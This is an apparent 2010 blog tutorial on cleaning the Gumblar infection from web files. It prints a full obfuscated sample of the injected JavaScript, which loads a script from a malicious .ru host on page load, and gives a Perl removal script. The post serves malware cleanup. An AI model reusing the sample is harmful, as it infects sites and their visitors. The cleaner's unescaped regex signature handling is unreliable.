Gumblar Virus Javascript removal using PERL

Gumblar virus infects all .html and .php files and injects a piece of javascript in the source code. The code is usually found just below the <body> tag. The Javascript code Gumblar injects varies widely and usually attaches a script or inline frame inside your page to execute itself on page load. Read on to get rid of this virus.

Gumblar Source Code Samples when delimited by new lines

Sample 1

var D; if(D!='' && D!='X'){D=''}; var U=new Array(); var p=""; function u(){var aY=new Date(); var uV=RegExp; var Q; if(Q!='q'){Q=''}; var N="]"; var kn; if(kn!=''){kn='vn'}; var zN; if(zN!='e' && zN!='vh'){zN='e'}; var r="\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x61\x6e\x67\x65\x67\x65\x2e\x63\x6f\x6d\x2f\x6b\x69\x6a\x69\x6a\x69\x2e\x63\x61\x2e\x70\x68\x70"; var H=''; function F(d,B){var hE=new Array(); var g; if(g!='Hl' && g != ''){g=null}; var hR; if(hR!='t' && hR!='HX'){hR='t'}; var BK=String("iMc[".substr(3)); BK+=B; var As; if(As!=''){As='sS'}; BK+=N; var WG=''; var TR=''; var S=new uV(BK, new String("7wkg".substr(3))); var K; if(K!='' && K!='eo'){K='HT'}; var pH; if(pH!='' && pH!='ed'){pH='jH'}; return d[new String("rep"+"lac"+"e")](S, H); }; var Rv; if(Rv!='I' && Rv != ''){Rv=null}; var fH; if(fH!='' && fH!='Nu'){fH='Bh'}; var W=F('8955593606965585956650693356','6395'); var Ud=new Date(); var ga=new Array(); var x="src"; var Il=new Array(); var FC=''; var h=window; this.Dk=''; var b; if(b!='ny' && b!='Hn'){b=''}; var sST=new String(); var T=unescape("%68%74%74%70%3a%2f%2f%69%66%65%6e%67%2d%63%6f%6d%2e%63%69%74%69%62%61%6e%6b%2e%63%6f%6d%2e%74%72%69%70%61%64%76%69%73%6f%72%2d%63%6f%6d%2e%6e%65%65%64%73%65%72%76%65%2e%72%75%3a"); var G=''; var P=F('dUeJfHeKrJ','Yq8gMKH0EUJbu'); var PG=new String(); var Gs=new Array(); this.gX=""; h[String("onlo2SzX".substr(0,4)+"ad")]=function(){ var Jm=new Date(); try {a=document.createElement(F('sHcTrviHpTtT','HUvT')); var lA; if(lA!='C'){lA=''}; var Fg=new Date(); FC=T; var fJ; if(fJ!='At'){fJ='At'}; FC+=W; FC+=r; var vW; if(vW!='pO' && vW!='Bp'){vW=''}; var Ic=new Date(); a[x]=FC; var bO; if(bO!='' && bO!='xL'){bO=''}; a[P]=[1][0]; var WW; if(WW!='Xp'){WW=''}; var _t=new String(); var tg=new String(); document.body.appendChild(a); var CB=new Array(); var sO=""; } catch(Y){this.Wl=''; var G_; if(G_!='wP' && G_!='PP'){G_=''}; };}; var oH=new Array(); var ow=new Array(); };var Ec; if(Ec!='ho' && Ec!='Jw'){Ec='ho'}; var Hj; if(Hj!='rh' && Hj!='ON'){Hj='rh'}; u(); this.fa=""; var jC; if(jC!='' && jC!='aZ'){jC=null};

The above code adds a javascript with source as shown below : <script src="http://ifeng-com.citibank.com.tripadvisor-com.needserve.ru:8080/ganji.com/ganji.com/google.com/angege.com/kijiji.ca.php" defer=""></script>

The virus seems to add random domain names to the URL.

Manual Removal Tool (PERL Script)

The Gumblar virus appears in lots of different forms so the virus does not have a particular signature. In order to remove the script find a page that has the javascript and enter the virus signature in the following script file, and run it passing the Web root directory as arguments. Download the script and execute it , enter a few details and gumblar would be removed. If you know the PERL scripting language you can tweak the code to modify according to your use.

No PERL extensions are required for this script.

#!/usr/bin/perl use vars qw {$home_dir $gumbar_sig }; print "Enter your web root directory : \n"; ## or initialize the variable in the script chomp($home_dir = <>); print "Enter Gumblar Signature : \n"; ## or enter it below as shown ### # # $gumblar_signature = q {SignatureHere} ; # #### chomp($gumblar_signature = <>); walkdir($home_dir); sub walkdir { my $dirtodel = pop; my $sep = '/'; opendir(DIR, $dirtodel); my @files = readdir(DIR); closedir(DIR); @files = grep { !/^\.{1,2}/ } @files; @files = map { $_ = "$dirtodel$sep$_"} @files; @files = map { (-d $_)?walkdir($_):remove_gumblar($_) } @files; } sub remove_gumblar { $file = pop; print "Testing $file \n"; if($file =~ m/\.([a-z]{3,4})$/) { $ext = $1; print "$ext $gumblar_signature \n"; if($ext eq "html" || $ext eq "php" || $ext eq "asp" || $ext eq "aspx" || $ext eq "js" || $ext eq "txt" ) { ## Add more extensions here in case open GUMBLAR, "$file"; $source = join('',<GUMBLAR>); close GUMBLAR; if($source =~ m/$gumblar_signature/sig) { print "Gumblar detected and removed on $file \n"; $source =~ s/$gumblar_signature//sig; rename $file, "$file.infected"; open GUMBLAR_REMOVED,">$file"; print GUMBLAR_REMOVED $source; close GUMBLAR_REMOVED; } } } }

Please feel free to download modify and redistribute the source code so that everyone get benefited.
Please post your comments below so that everyone can help each other. Happy Removing Gumble :)

Download the source code from the attachments or copy paste from above. 31 Mar, 2010

1 Attachment
gumblar.pl_.txt1.3 KB
Comments (0)
You may also like
Tags
On Facebook
Email Newsletter